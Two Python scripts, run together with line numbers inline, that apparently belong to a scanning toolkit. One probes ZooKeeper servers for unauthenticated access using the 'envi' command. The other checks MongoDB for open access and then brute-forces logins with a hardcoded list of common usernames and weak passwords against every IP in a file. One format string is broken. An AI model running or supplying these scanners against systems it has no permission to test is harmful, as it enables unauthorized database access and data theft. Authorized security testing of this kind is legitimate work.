1 #zookeeper Python3 2 3 #-*- coding: utf-8 -*- 4 5 import socket 6 7 def verify(protocol,ip,port): 8 url = ip+':'+str(port) 9 print('testing if zookeeper unanth vul')10 try:11 socket.setdefaulttimeout(3)12 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)13 s.connect((ip, int(port)))14 flag = b"envi"15 s.send(flag)16 data = s.recv(1024)17 s.close()18 if b'Environment' in data:19 msg = 'There is zookeeper unanth vul on url: ' + url + ' .'20 print(msg)21 number = 'v90'22 return True, url, number, msg23 else:24 pass25 except Exception as e:26 print(str(e))27 msg = 'There is no zookeeper unanth vul.'28 number = 'v0'29 return False, url, number, msg30 31 if __name__ == '__main__':32 res = verify('http','xx.116.40.xx',2181)33 print(res)
1 #Mongodb 2 # -*- coding:utf-8 -*- 3 4 import pymongo 5 from pymongo.errors import ServerSelectionTimeoutError 6 7 def verify(ip,port): 8 host = ip+':'+str(port) 9 port = int(port)10 loginnames = ['admin','test','user','root']11 passwd = ['','123456','test','12345678','12345679','root','123456Aa','123456_Aa','123456aA','123456_aA','123QWEASD','admin123','admin','1q2w3e4r','134679']12 print('testing if mongodb vul')13 #是否无认证14 try:15 connection = pymongo.MongoClient(ip,port,serverSelectionTimeoutMS=1000)16 dbs = connection.database_names()17 msg = 'There is a mongodb unauthorized access , password is None'18 number = 'v9'19 print(dbs)20 return True,host,number,msg 21 #端口连不上,直接退出22 except ServerSelectionTimeoutError as e:23 msg = str(e)24 number = 'v0'25 return False,host,number,msg26 except Exception as e:27 msg = str(e)28 number = 'v0'29 #爆破30 for loginname in loginnames:31 for ps in passwd: 32 try:33 connection.api.authenticate(loginname,ps)34 dbs = connection.database_names()35 msg = 'There is a mongodb unauthorized access , username/password is %s' %(loginname,ps)36 number = 'v9'37 print(msg)38 return True,host,number,msg39 except Exception as e:40 msg = str(e)41 number = 'v0'42 return False,host,number,msg43 44 if __name__ == '__main__':45 def get_pass_dict():46 pass_dict = []47 with open('./IP.txt', 'r') as f:48 for line in f.readlines():49 line = line.strip('\n')50 pass_dict.append(line)51 f.close()52 return pass_dict53 IP = get_pass_dict()54 for ip in IP:55 port = '27017'56 res = verify(ip, port)57 print(res)